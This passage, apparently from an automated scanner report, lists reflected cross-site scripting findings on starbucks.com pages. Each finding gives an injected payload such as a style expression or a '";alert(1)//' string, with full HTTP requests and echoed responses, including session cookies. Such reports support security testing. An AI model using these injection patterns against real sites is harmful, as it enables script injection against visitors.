p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:38 GMT
Connection: close
Content-Length: 41639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community?9fa72"style="x:expression(alert(1))"5a47d7b77de=1" />
...[SNIP]...

1.671. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 49dde"style="x:expression(alert(1))"e7346a933d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community/mystarbucksidea?49dde"style%3d"x%3aexpression(alert(1))"e7346a933d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:15 GMT
Connection: close
Content-Length: 41683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/community/mystarbucksidea?49dde"style="x:expression(alert(1))"e7346a933d9=1"/>
...[SNIP]...

1.672. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f184b"style="x:expression(alert(1))"96125b2cebe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/entertainment?f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:51 GMT
Connection: close
Content-Length: 54188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?f184b"style="x:expression(alert(1))"96125b2cebe=1" />
...[SNIP]...

1.673. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90a4e"%3balert(1)//d2bb761e82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90a4e";alert(1)//d2bb761e82e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/entertainment?90a4e"%3balert(1)//d2bb761e82e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:54 GMT
Connection: close
Content-Length: 54093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
pt">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96861445001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/entertainment?90a4e";alert(1)//d2bb761e82e=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.674. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4131d"style="x:expression(alert(1))"c25fff327f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps?4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 40635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?4131d"style="x:expression(alert(1))"c25fff327f9=1"/>
...[SNIP]...

1.675. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fa55"%3balert(1)//0b5e66ea4df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa55";alert(1)//0b5e66ea4df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse/mobile-apps?7fa55"%3balert(1)//0b5e66ea4df=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:57 GMT
Connection: close
Content-Length: 40540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
ript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96890007001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse/mobile-apps?7fa55";alert(1)//0b5e66ea4df=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.676. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae0f9"style="x:expression(alert(1))"6743e2ed601 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/mystarbucks?ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:36 GMT
Connection: close
Content-Length: 37985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?ae0f9"style="x:expression(alert(1))"6743e2ed601=1"/>
...[SNIP]...

1.677. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed19c"style%3d"x%3aexpression(alert(1))"695c8291744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed19c"style="x:expression(alert(1))"695c8291744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style%3d"x%3aexpression(alert(1))"695c8291744=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:30 GMT
Connection: close
Content-Length: 38490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style="x:expression(alert(1))"695c8291744=1"/>
...[SNIP]...

1.678. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21513"style="x:expression(alert(1))"30c5ed9534e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:56 GMT
Connection: close
Content-Length: 39080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style="x:expression(alert(1))"30c5ed9534e=1"/>
...[SNIP]...

1.679. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/store-design

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5833a"style%3d"x%3aexpression(alert(1))"12718e18e54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5833a"style="x:expression(alert(1))"12718e18e54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/store-design?5833a"style%3d"x%3aexpression(alert(1))"12718e18e54=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:20 GMT
Connection: close
Content-Length: 43622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?5833a"style="x:expression(alert(1))"12718e18e54=1" />
...[SNIP]...

1.680. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a344c"style="x:expression(alert(1))"5d8d4bfdaf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet?a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:38 GMT
Connection: close
Content-Length: 38028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a344c"style="x:expression(alert(1))"5d8d4bfdaf3=1"/>
...[SNIP]...

1.681. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95eff"style%3d"x%3aexpression(alert(1))"52d652315b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95eff"style="x:expression(alert(1))"52d652315b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/in-canada?95eff"style%3d"x%3aexpression(alert(1))"52d652315b0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:53 GMT
Connection: close
Content-Length: 38308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?95eff"style="x:expression(alert(1))"52d652315b0=1"/>
...[SNIP]...

1.682. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db28c"style="x:expression(alert(1))"a963d7ce712 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network?db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:11:32 GMT
Connection: close
Content-Length: 38766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?db28c"style="x:expression(alert(1))"a963d7ce712=1"/>
...[SNIP]...

1.683. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c2f"style%3d"x%3aexpression(alert(1))"8870702513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c2f"style="x:expression(alert(1))"8870702513a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service?41c2f"style%3d"x%3aexpression(alert(1))"8870702513a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:25:03 GMT
Connection: close
Content-Length: 34417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service?41c2f"style="x:expression(alert(1))"8870702513a=1"/>
...[SNIP]...

1.684. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 655a7"style="x:expression(alert(1))"cacda66d35a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/contact?655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:58 GMT
Connection: close
Content-Length: 37233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/contact?655a7"style="x:expression(alert(1))"cacda66d35a=1"/>
...[SNIP]...

1.685. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
